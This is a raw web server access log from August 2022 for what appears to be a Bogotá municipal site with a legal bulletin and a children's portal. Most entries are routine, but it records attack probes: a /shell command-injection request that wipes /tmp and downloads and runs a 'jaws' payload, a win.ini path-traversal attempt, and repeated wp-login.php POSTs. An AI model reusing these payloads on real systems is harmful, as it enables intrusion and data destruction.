201.245.192.253 - - [31/Aug/2022:04:46:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:04:44:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
216.245.221.92 - - [31/Aug/2022:04:48:30 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.97 - - [31/Aug/2022:04:50:07 -0500] "-" 408 -
173.252.87.6 - - [31/Aug/2022:04:50:25 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
201.245.192.253 - - [31/Aug/2022:04:51:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:04:49:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:04:50:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
216.245.221.92 - - [31/Aug/2022:04:53:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.81 - - [31/Aug/2022:04:53:46 -0500] "-" 408 -
185.119.81.107 - - [31/Aug/2022:04:55:17 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.107 - - [31/Aug/2022:04:55:18 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
201.245.192.253 - - [31/Aug/2022:04:56:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
84.17.52.130 - - [31/Aug/2022:04:56:53 -0500] "GET /wp-admin/includes/ HTTP/1.1" 404 1035
84.17.52.130 - - [31/Aug/2022:04:56:57 -0500] "GET /wp-admin/includes/ HTTP/1.1" 404 1032
172.22.2.4 - - [31/Aug/2022:04:55:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:04:56:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
216.245.221.92 - - [31/Aug/2022:04:58:30 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.36 - - [31/Aug/2022:04:59:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/2001%201250-1299.tif HTTP/1.1" 200 5430753
66.249.73.127 - - [31/Aug/2022:05:00:13 -0500] "-" 408 -
207.46.13.186 - - [31/Aug/2022:05:00:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/2001%20100-149.TIF HTTP/1.1" 200 9839060
201.245.192.253 - - [31/Aug/2022:05:01:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
34.141.253.63 - - [31/Aug/2022:05:01:37 -0500] "GET / HTTP/1.1" 200 319
34.141.253.63 - - [31/Aug/2022:05:01:37 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [31/Aug/2022:05:01:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.105 - - [31/Aug/2022:05:03:26 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [31/Aug/2022:05:03:27 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
216.245.221.92 - - [31/Aug/2022:05:03:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.234 - - [31/Aug/2022:05:03:46 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:05:02:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52868
172.22.2.4 - - [31/Aug/2022:05:03:55 -0500] "GET /BLA/boletinlegal/Electron/download/windows/%5CWindows%5Cwin.ini HTTP/1.1" 404 1011
201.245.192.253 - - [31/Aug/2022:05:05:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [31/Aug/2022:05:08:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:05:07:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:05:07:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [31/Aug/2022:05:10:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
157.55.39.51 - - [31/Aug/2022:05:13:23 -0500] "GET /portaldeninos/parque-ecologico-distrital-humedal-santa-maria-del-lago/ HTTP/1.1" 200 90199
216.245.221.92 - - [31/Aug/2022:05:13:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:05:13:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
77.88.5.226 - - [31/Aug/2022:05:13:46 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:05:12:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:05:13:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57366
201.245.192.253 - - [31/Aug/2022:05:15:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:05:16:45 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%2000010%20del%2027%20de%20julio%20de%202020.pdf HTTP/1.1" 304 -
216.245.221.92 - - [31/Aug/2022:05:18:30 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2022:05:20:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42305
201.245.192.253 - - [31/Aug/2022:05:20:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42772
172.22.2.4 - - [31/Aug/2022:05:18:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2022:05:20:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:05:19:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56005
216.245.221.92 - - [31/Aug/2022:05:23:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.86 - - [31/Aug/2022:05:23:46 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:05:25:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:05:26:04 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2006%20del%2016%20de%20Agosto%20de%202017.pdf HTTP/1.1" 304 -
172.22.2.4 - - [31/Aug/2022:05:24:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.51 - - [31/Aug/2022:05:26:23 -0500] "GET /portaldeninos/home-2-3/feed/ HTTP/1.1" 200 793
157.55.39.8 - - [31/Aug/2022:05:27:00 -0500] "GET /bla/resoluciones/notificaciones/registros%202020/00737.pdf HTTP/1.1" 304 -
172.22.2.4 - - [31/Aug/2022:05:25:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
207.46.13.186 - - [31/Aug/2022:05:27:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2443.pdf HTTP/1.1" 200 438764
216.245.221.92 - - [31/Aug/2022:05:28:30 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2022:05:30:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42305
201.245.192.253 - - [31/Aug/2022:05:30:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42772
201.245.192.253 - - [31/Aug/2022:05:30:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:05:30:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:05:32:57 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%206%20del%208%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 304 -
172.22.2.4 - - [31/Aug/2022:05:31:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
186.154.33.73 - - [31/Aug/2022:05:33:28 -0500] "GET /bogota-destacada-en-america-latina-por-su-accion-climatica.html HTTP/1.1" 200 768
216.245.221.92 - - [31/Aug/2022:05:33:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.33 - - [31/Aug/2022:05:33:46 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:05:35:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:05:36:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [31/Aug/2022:05:38:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:05:37:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [31/Aug/2022:05:40:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42305
201.245.192.253 - - [31/Aug/2022:05:40:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42772
201.245.192.253 - - [31/Aug/2022:05:40:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [31/Aug/2022:05:43:30 -0500] "HEAD / HTTP/1.1" 200 -
93.158.161.59 - - [31/Aug/2022:05:43:46 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:05:43:48 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [31/Aug/2022:05:42:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:05:43:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [31/Aug/2022:05:43:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [31/Aug/2022:05:43:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [31/Aug/2022:05:43:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [31/Aug/2022:05:43:49 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [31/Aug/2022:05:43:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [31/Aug/2022:05:43:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [31/Aug/2022:05:43:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [31/Aug/2022:05:43:49 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [31/Aug/2022:05:43:49 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [31/Aug/2022:05:42:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
201.245.192.253 - - [31/Aug/2022:05:45:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [31/Aug/2022:05:48:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:05:47:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:05:50:20 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%2011%20del%2027%20de%20Diciembre%20de%202011.pdf HTTP/1.1" 304 -
172.22.2.4 - - [31/Aug/2022:05:48:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55621
201.245.192.253 - - [31/Aug/2022:05:50:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [31/Aug/2022:05:53:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.30 - - [31/Aug/2022:05:53:46 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:05:53:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2022:05:55:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:05:54:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56367
172.22.2.4 - - [31/Aug/2022:05:55:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.245.221.92 - - [31/Aug/2022:05:58:30 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2022:06:00:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:05:59:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:06:00:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57716
157.55.39.108 - - [31/Aug/2022:06:02:21 -0500] "GET /portaldeninos/humedal-el-burro-2/ HTTP/1.1" 200 87926
66.249.73.127 - - [31/Aug/2022:06:02:38 -0500] "-" 408 -
40.77.167.52 - - [31/Aug/2022:06:02:46 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
40.77.167.52 - - [31/Aug/2022:06:02:46 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
40.77.167.52 - - [31/Aug/2022:06:02:46 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
40.77.167.52 - - [31/Aug/2022:06:02:46 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
40.77.167.52 - - [31/Aug/2022:06:02:47 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
40.77.167.52 - - [31/Aug/2022:06:02:47 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
157.55.39.51 - - [31/Aug/2022:06:02:47 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
40.77.167.40 - - [31/Aug/2022:06:02:48 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
157.55.39.108 - - [31/Aug/2022:06:02:50 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
207.46.13.51 - - [31/Aug/2022:06:02:50 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
207.46.13.144 - - [31/Aug/2022:06:02:51 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
207.46.13.144 - - [31/Aug/2022:06:02:52 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
207.46.13.144 - - [31/Aug/2022:06:02:52 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
207.46.13.144 - - [31/Aug/2022:06:02:52 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
207.46.13.144 - - [31/Aug/2022:06:02:52 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
157.55.39.51 - - [31/Aug/2022:06:02:57 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
40.77.167.40 - - [31/Aug/2022:06:03:01 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
40.77.167.40 - - [31/Aug/2022:06:03:01 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
157.55.39.108 - - [31/Aug/2022:06:03:10 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
157.55.39.108 - - [31/Aug/2022:06:03:10 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
207.46.13.51 - - [31/Aug/2022:06:03:14 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.ttf?93978679 HTTP/1.1" 200 124684
207.46.13.51 - - [31/Aug/2022:06:03:15 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
207.46.13.51 - - [31/Aug/2022:06:03:16 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
216.245.221.92 - - [31/Aug/2022:06:03:30 -0500] "HEAD / HTTP/1.1" 200 -
180.195.199.65 - - [31/Aug/2022:06:03:34 -0500] "-" 408 -
207.46.13.144 - - [31/Aug/2022:06:03:38 -0500] "GET / HTTP/1.1" 200 319
93.158.161.60 - - [31/Aug/2022:06:03:46 -0500] "-" 408 -
194.156.111.4 - - [31/Aug/2022:06:03:50 -0500] "-" 408 -
138.75.190.212 - - [31/Aug/2022:06:04:02 -0500] "-" 408 -
197.246.175.214 - - [31/Aug/2022:06:04:37 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:06:05:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
173.252.127.118 - - [31/Aug/2022:06:05:58 -0500] "GET /guadalupe-aguanoso-y-otros-tres-caminos-de-los-cerros-estarin-cerrados-este-fin-de-semana.html HTTP/1.1" 206 797
172.22.2.4 - - [31/Aug/2022:06:05:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:06:06:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59819
185.119.81.100 - - [31/Aug/2022:06:08:17 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [31/Aug/2022:06:08:18 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [31/Aug/2022:06:08:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:06:09:29 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [31/Aug/2022:06:09:52 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [31/Aug/2022:06:10:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:06:11:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:06:11:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48343
216.245.221.92 - - [31/Aug/2022:06:13:30 -0500] "HEAD / HTTP/1.1" 200 -
93.158.161.62 - - [31/Aug/2022:06:13:46 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:06:12:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52484
172.22.2.4 - - [31/Aug/2022:06:14:11 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%203%20del%2005%20de%20abril%20de%202013.pdf HTTP/1.1" 304 -
157.55.39.80 - - [31/Aug/2022:06:15:01 -0500] "GET /Publicaciones/2022EE182096.pdf HTTP/1.1" 404 228
172.22.2.4 - - [31/Aug/2022:06:15:33 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7443
172.22.2.4 - - [31/Aug/2022:06:15:33 -0500] "GET /BLA/boletinlegal/js/ajax_conceptos.js HTTP/1.1" 200 1326
172.22.2.4 - - [31/Aug/2022:06:15:33 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [31/Aug/2022:06:15:34 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [31/Aug/2022:06:15:34 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [31/Aug/2022:06:15:34 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [31/Aug/2022:06:15:34 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [31/Aug/2022:06:15:34 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [31/Aug/2022:06:15:34 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [31/Aug/2022:06:15:34 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [31/Aug/2022:06:15:34 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [31/Aug/2022:06:15:34 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [31/Aug/2022:06:15:34 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [31/Aug/2022:06:15:34 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [31/Aug/2022:06:15:35 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [31/Aug/2022:06:15:35 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [31/Aug/2022:06:15:35 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [31/Aug/2022:06:15:35 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [31/Aug/2022:06:15:35 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [31/Aug/2022:06:15:35 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [31/Aug/2022:06:15:35 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [31/Aug/2022:06:15:35 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1334
172.22.2.4 - - [31/Aug/2022:06:15:38 -0500] "GET /BLA/boletinlegal/consulta_conceptos.php?no=&solicitante=&radicado_entrada=&fecha_concepto=2022&objeto= HTTP/1.1" 200 18450
172.22.2.4 - - [31/Aug/2022:06:15:38 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [31/Aug/2022:06:15:42 -0500] "GET /BLA/boletinlegal/conceptos/2022/35.pdf HTTP/1.1" 404 1334
201.245.192.253 - - [31/Aug/2022:06:15:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:06:15:52 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [31/Aug/2022:06:15:52 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [31/Aug/2022:06:15:52 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [31/Aug/2022:06:15:52 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [31/Aug/2022:06:15:52 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [31/Aug/2022:06:15:52 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [31/Aug/2022:06:15:59 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [31/Aug/2022:06:15:59 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [31/Aug/2022:06:15:59 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [31/Aug/2022:06:15:59 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [31/Aug/2022:06:15:52 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 36811
172.22.2.4 - - [31/Aug/2022:06:17:55 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_Sent%20Tutela%20Drumond.docx HTTP/1.1" 200 25380
172.22.2.4 - - [31/Aug/2022:06:17:56 -0500] "GET /BLA/boletinlegal/Directivas/2013/Directiva%20No.%201%20del%2004%20de%20Abril%20de%202013.pdf HTTP/1.1" 304 -
216.245.221.92 - - [31/Aug/2022:06:18:30 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.103 - - [31/Aug/2022:06:18:34 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [31/Aug/2022:06:18:35 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
40.77.189.188 - - [31/Aug/2022:06:18:42 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
172.22.2.4 - - [31/Aug/2022:06:17:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:06:17:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56723
172.22.2.4 - - [31/Aug/2022:06:19:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [31/Aug/2022:06:20:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42480
201.245.192.253 - - [31/Aug/2022:06:20:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42798
201.245.192.253 - - [31/Aug/2022:06:20:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [31/Aug/2022:06:23:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.207 - - [31/Aug/2022:06:23:46 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:06:22:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:06:23:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57366
201.245.192.253 - - [31/Aug/2022:06:25:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
77.88.5.208 - - [31/Aug/2022:06:28:24 -0500] "-" 408 -
216.245.221.92 - - [31/Aug/2022:06:28:30 -0500] "HEAD / HTTP/1.1" 200 -
93.158.161.34 - - [31/Aug/2022:06:28:30 -0500] "-" 408 -
77.88.5.39 - - [31/Aug/2022:06:28:35 -0500] "-" 408 -
77.88.5.215 - - [31/Aug/2022:06:28:41 -0500] "-" 408 -
77.88.5.37 - - [31/Aug/2022:06:28:56 -0500] "-" 408 -
77.88.5.24 - - [31/Aug/2022:06:29:11 -0500] "-" 408 -
77.88.5.168 - - [31/Aug/2022:06:29:41 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:06:30:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42480
201.245.192.253 - - [31/Aug/2022:06:30:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42798
172.22.2.4 - - [31/Aug/2022:06:28:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
77.88.5.6 - - [31/Aug/2022:06:30:41 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:06:30:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:06:30:56 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17573
172.22.2.4 - - [31/Aug/2022:06:29:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56723
93.158.161.40 - - [31/Aug/2022:06:31:41 -0500] "-" 408 -
20.21.233.240 - - [31/Aug/2022:06:33:18 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+0.0.0.0/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
216.245.221.92 - - [31/Aug/2022:06:33:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.3 - - [31/Aug/2022:06:33:42 -0500] "-" 408 -
185.196.220.70 - - [31/Aug/2022:06:34:17 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [31/Aug/2022:06:35:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
